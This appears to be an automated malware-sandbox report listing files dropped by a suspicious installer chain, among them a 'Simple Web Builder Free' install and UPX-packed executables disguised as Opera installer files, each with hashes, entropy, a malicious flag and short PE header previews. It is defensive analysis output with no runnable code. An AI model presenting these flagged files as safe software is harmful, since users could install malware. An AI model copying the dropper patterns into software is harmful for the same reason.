                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\is-PANN7.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):717985
                                                                                                                          Entropy (8bit):6.51488668649805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+LIq5MRxyFy:SPcYn5c/rPx37/zHBA6pFptZ1CECqMRz
                                                                                                                          MD5:0789C3F22DFED777F74C9221B9F15DC4
                                                                                                                          SHA1:E02D879A7D295729D4D312714DD961389292EF93
                                                                                                                          SHA-256:CB7F66BBD879BC30BA3344B0E6F7AB30433A09D34453880034C16B02733D30B3
                                                                                                                          SHA-512:13E881364CD7E4920728684EC85B5BB81861C16DF9373B0A2830C07476DEA21A9C437C51373719C456AA5DD751058AD29507F58CE7FF5E52E137EE9745FC2EC7
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105784
                                                                                                                          Entropy (8bit):6.258144336244945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmp

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40974
                                                                                                                          Entropy (8bit):6.485702128133584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):105784
                                                                                                                          Entropy (8bit):6.258144336244945
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):125637
                                                                                                                          Entropy (8bit):6.2640431186303145
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........,.....&#...$.d.........................n.........................`............@... .........................u.... ..x............................P....................................................... ...............................text...8b.......d..................`.P`.data...(............h..............@.0..rdata...".......$...j..............@.`@/4.......4.......6..................@.0@.bss..................................0..edata..u...........................@.0@.idata..x.... ......................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc.......P......................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):40974
                                                                                                                          Entropy (8bit):6.485702128133584
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:kB8JMzjwsTYQgUvXtrs7GtUplYj7SG7MLXm:kmMwsTYwvXhZP77SW
                                                                                                                          MD5:F47E78AD658B2767461EA926060BF3DD
                                                                                                                          SHA1:9BA8A1909864157FD12DDEE8B94536CEA04D8BD6
                                                                                                                          SHA-256:602C2B9F796DA7BA7BF877BF624AC790724800074D0E12FFA6861E29C1A38144
                                                                                                                          SHA-512:216FA5AA6027C2896EA5C499638DB7298DFE311D04E1ABAC302D6CE7F8D3ED4B9F4761FE2F4951F6F89716CA8104FA4CE3DFECCDBCA77ED10638328D0F13546B
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...!.F...................`.....p......................... ......I5........ .................................................................@...........................L........................................................text....E.......F..................`.P`.data...0....`.......J..............@.0..rdata..$&...p...(...L..............@.`@/4......<............t..............@.0@.bss..................................`..edata..............................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):176200
                                                                                                                          Entropy (8bit):6.647007817777345
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:1536:9teve4OMTqM/iKAo+/zO9RhR9aPTxRm1TxStoBtwIbaU+yUsXxTTLRazIxSp/FjU:ze24OM+M/bAWK9Rm1NXwIl+/I9RtqIn
                                                                                                                          MD5:6896DC57D056879F929206A0A7692A34
                                                                                                                          SHA1:D2F709CDE017C42916172E9178A17EB003917189
                                                                                                                          SHA-256:8A7D2DA7685CEDB267BFA7F0AD3218AFA28F4ED2F1029EE920D66EB398F3476D
                                                                                                                          SHA-512:CD1A981D5281E8B2E6A8C27A57CDB65ED1498DE21D2B7A62EDC945FB380DEA258F47A9EC9E53BD43D603297635EDFCA95EBCB2A962812CD53C310831242384B8
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........8......#...#.b........................tm......................... ......z.....@... .........................E....................................................................w.......................................................text....a.......b..................`.P`.data...P............f..............@.P..rdata...............h..............@.`@/4...............0...Z..............@.0@.bss..................................0..edata..E...........................@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..............................@.0B................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):68552
                                                                                                                          Entropy (8bit):6.1042544770100395
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:768:Jd8ALXCfP6bO/XfLCwiWBot9ZOGLuNTizPm3YRiFVinPHF:X8fq+X9OjZ2APm3YeinPl
                                                                                                                          MD5:F06B0761D27B9E69A8F1220846FF12AF
                                                                                                                          SHA1:E3A2F4F12A5291EE8DDC7A185DB2699BFFADFE1A
                                                                                                                          SHA-256:E85AECC40854203B4A2F4A0249F875673E881119181E3DF2968491E31AD372A4
                                                                                                                          SHA-512:5821EA0084524569E07BB18AA2999E3193C97AA52DA6932A7971A61DD03D0F08CA9A2D4F98EB96A603B99F65171F6D495D3E8F2BBB2FC90469C741EF11B514E9
                                                                                                                          Malicious:true
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........V......#...$...........................d................................Y_....@... ..............................0..t....`..P....................p..............................`........................1..H............................text..............................`.P`.data...L...........................@.0..rdata..............................@.0@/4......,3.......4..................@.0@.bss..................................0..edata..............................@.0@.idata..t....0......................@.0..CRT....0....@......................@.0..tls.........P......................@.0..rsrc...P....`......................@.0..reloc.......p......................@.0B........................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:modified
                                                                                                                          Size (bytes):1888210
                                                                                                                          Entropy (8bit):6.979353805786148
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:lHZ2IxEvbn0MdESx+ZFehvnATV3oR6GKIlb/xBxlKtIH6/qKsTRBEqkF71elDPIL:lJxEvnE6oUhPATV4RsIb/xBxlKe27Qu
                                                                                                                          MD5:7BFD8C9EBE20C4BF0BED7F74A74E8646
                                                                                                                          SHA1:6098711FD405855097A78442A8A195E04BFAB1CD
                                                                                                                          SHA-256:BA6625BECE4E980DE77E555B8626F63BEC81CA9BA3E40701F7ED201DB25153FD
                                                                                                                          SHA-512:8DF13158A2D806A6E2D49CECA8DEE411E07F96F63876DBD64E6ED3424765062312AC1C4E7EB0EB7683443240B9B52022F8977094063A1509395A6C45BEEC6893
                                                                                                                          Malicious:true
                                                                                                                          Yara Hits:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe, Author: Joe Security
                                                                                                                          Antivirus:
                                                                                                                          • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C.i^..........'.................0.............@..................................................................................................................................................................................................text............................... ..`.rdata.. 1.......@..................@..@.data....T... ...0... ..............@....rsrc................P..............@..@.short1..............P..............`...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.dat

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:InnoSetup Log Simple Web Builder Free, version 0x30, 4769 bytes, 364339\user, "C:\Users\user\AppData\Local\Simple Web Builder Free"
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4769
                                                                                                                          Entropy (8bit):4.745578697495794
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:GidWl386pKDN5n9v+eOIhJyT4cVSQs0Ln8/i:VdWl3dpKfoHIhQ8cVSQ1n86
                                                                                                                          MD5:227E7867C240FC9571A4A204BB1E8D81
                                                                                                                          SHA1:F294C3069D8B9506C83977C7B028CD2AE1648F80
                                                                                                                          SHA-256:4972C716DF440C3C1C28FD40E1DB61709056A90902555FA714DD15B1F13D8C65
                                                                                                                          SHA-512:51112BF92B3D5AD9CB8E786A1A4DCE6FF0A2BF73DAD0F58490650F67AC7F85F0EDD99D58263ED8BEC8267AD302108C61AEA453DE5AB43DCA7EDC2D3FF808D97A
                                                                                                                          Malicious:false
                                                                                                                          Preview:Inno Setup Uninstall Log (b)....................................Simple Web Builder Free.........................................................................................................Simple Web Builder Free.........................................................................................................0...........%...............................................................................................................|............?.+......V....364339.user5C:\Users\user\AppData\Local\Simple Web Builder Free...........4.(./.. .....K......IFPS.............................................................................................................BOOLEAN..............TWIZARDFORM....TWIZARDFORM.........TPASSWORDEDIT....TPASSWORDEDIT...........................................!MAIN....-1..(...dll:kernel32.dll.CreateFileA..............$...dll:kernel32.dll.WriteFile............"...dll:kernel32.dll.CloseHandle........"...dll:kernel32.dll.ExitProcess........%...dll:

                                                                                                                          C:\Users\user\AppData\Local\Simple Web Builder Free\unins000.exe (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):717985
                                                                                                                          Entropy (8bit):6.51488668649805
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:12288:6TPcYn5c/rPx37/zHBA6a5UeYpthr1CERAgrNuR+LIq5MRxyFy:SPcYn5c/rPx37/zHBA6pFptZ1CECqMRz
                                                                                                                          MD5:0789C3F22DFED777F74C9221B9F15DC4
                                                                                                                          SHA1:E02D879A7D295729D4D312714DD961389292EF93
                                                                                                                          SHA-256:CB7F66BBD879BC30BA3344B0E6F7AB30433A09D34453880034C16B02733D30B3
                                                                                                                          SHA-512:13E881364CD7E4920728684EC85B5BB81861C16DF9373B0A2830C07476DEA21A9C437C51373719C456AA5DD751058AD29507F58CE7FF5E52E137EE9745FC2EC7
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................~........................@..............................................@...............................%..................................................................................................................CODE.....}.......~.................. ..`DATA................................@...BSS......................................idata...%.......&..................@....tls.....................................rdata..............................@..P.reloc....... ......................@..P.rsrc...............................@..P.....................T..............@..P........................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\TSj4lbXBm0ozR2JnFqSdYKyt.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2146090
                                                                                                                          Entropy (8bit):7.982011327302058
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:LnQx4yrQsuKCDVZrKLbCW0wuY3X/BvLwJBg:qUKLpuY3PBDwJ2
                                                                                                                          MD5:0D69DD3893505245669619A06840C2FE
                                                                                                                          SHA1:4B62A51FFB4E5355D61F95962DAD44A97936FDB6
                                                                                                                          SHA-256:CA6667D8CED30113270B5728D6B104DA781A682F194FDCB1BD85FA2CD446FE19
                                                                                                                          SHA-512:650D6AF9F670D8CF28D965E52EC2AD6CB4EB58543E21DA6F9A4E3B1F9B239696300958FF51FF378FE02ED6AA3781DD9B91D5B9EADC53AEDB7EC441F1FF1DFC74
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.768475714302623
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:enSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHA:tWqlkLESgCRE/vhOjb05efd6e/oXHA
                                                                                                                          MD5:918151F14C10B6BB7533F6D97BF22D2D
                                                                                                                          SHA1:7B058C97929435886B28D658736BEBA993C7EA8F
                                                                                                                          SHA-256:7F4DF608DB59F2B9337C532B756AA885D4670A314339BCE35CD1D14106F73763
                                                                                                                          SHA-512:F05BB8A50AFA5E7D070D31CA1A57C3A15B1EE3927F16AB6FE27FBAE6AC9B5A0BE5484DB17BD5459E4ED02D3769C19B16B3CAE37E9A4DA0317E94374F5DFF05DC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......r-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\XgAVLWIvGKK9IeCrDuWuJavo.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.768479767034927
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:2nSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHI:lWqlkLESgCRE/vhOjb05efd6e/oXHI
                                                                                                                          MD5:442BA51AC0AF3E8D9F489F643AFA6268
                                                                                                                          SHA1:681867F9C25D27319DA3C197E5506CDA0FDDA36A
                                                                                                                          SHA-256:7974CDC50115E1D48544C30E120A7AF883B0B71281A17245100B197E282D4D51
                                                                                                                          SHA-512:F5C3350AF33AA92160989A0CF48605C49CEDDBBCD70849A4BD5974786A9BD912FF5102D6B984C434A8FF93C682625222D84988A7F711D81C8E2A3EA28D9028BC
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\bizN5UTpdWpltkCaYrvmwbQI.exe

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2960760
                                                                                                                          Entropy (8bit):7.7684742788158045
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:49152:TnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHQ:eWqlkLESgCRE/vhOjb05efd6e/oXHQ
                                                                                                                          MD5:45D3B5DA2599B55F638873CE9E5AF959
                                                                                                                          SHA1:A7D1E4BB85ACF0704795888C122F6F3B5061BB24
                                                                                                                          SHA-256:407EF2E99461CD63A29508433B363DE754413E387125C5EDF0BBD63D293B8AA8
                                                                                                                          SHA-512:8198EDB0D87C211F444D862AD2E8B277FBC36CBEF659E9E2F1E40DBCD7EE5E5EBA37F6A06461D67BD2D95F7B5BE2137182626F7BA20620BBA80E9F2EC7D1BD93
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853201\opera_package

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4964352
                                                                                                                          Entropy (8bit):7.998473446596747
                                                                                                                          Encrypted:true
                                                                                                                          SSDEEP:98304:ekAPDoNnW1oBnzMVYUCBfeMG0OTtp7fEj8LrtXHMjDTfLDL0YF:ekGAdnQUBfSTvf+gZmDTNF
                                                                                                                          MD5:5C56D0DF44349C651936E82A24925CAF
                                                                                                                          SHA1:327473E064955C1CDB12FB7E048B281C460252F4
                                                                                                                          SHA-256:DFAB6E84A885679529D9DDB456C3CB160CF90A446562D57F3695DECCA3BE503D
                                                                                                                          SHA-512:1C73ADE4528BE5A043036BBFDD321E7D1E4B1A30C5FE34BA8E8781BBE5E5036026591F741E4BB4682D7D5B45423307373C48A79DF781D716D6BEAA5FCC8D9D29
                                                                                                                          Malicious:true
                                                                                                                          Preview:MZ`.....................@...................................`...........!..L.!Require Windows..$PE..L...'..P.................(...F.......-.......@....@..........................................................................b...........................)...........................................................@..d............................text....&.......(.................. ..`.rdata...5...@...6...*..............@..@.data....)...........`..............@....rsrc................h..............@..@........U..`.A.......S3.;.VWt.f9.b.A.t...`.A.P....P.|..Y.nj'.v....u..v..=.BA..6P......P....9^..].v8.^..3......hhDA.P..........P......P..pAA..E..E....;F.r......P.J|..Y.24..j...lAA...t$..D....3.9.H.A.t...@....9D$.t..t$.Ph.....5@.A....BA.3.....D$..`...|$..u..@.....3.....t$..D$..t$...`.A......t$...P.Q..%`.A...D$...V...t...P.Q...^...VW.|$.....t...W.P.....t...P.Q..>.._^....T$..L$....f..AABBf..u..L$.3.f9.t.@f.<A.u..S.\$.V..C;^.tLW3.j.Z...........Q.......3.9F.Y~.9F.~...f..Af..G@;F.|..6....

                                                                                                                          C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403120853491\opera_package

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe
                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):941056
                                                                                                                          Entropy (8bit):7.96943376939049
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24576:xACKxHk1sJgDqrFXexjOEQUaV62+xVSE0wWqlS2iS:ep2ASqpeZOvDo9xVDzWIr
                                                                                                                          MD5:C4B3D160FC9FAEDA29D57A8B1FC94322
                                                                                                                          SHA1:1BAA6BE4E86EF620B977E85D36D48000629928E3
                                                                                                                          SHA-256:33E4A5ADAD5CA8997AB83F197D276ACA388A36487D572FFCA6D66086EE967F66
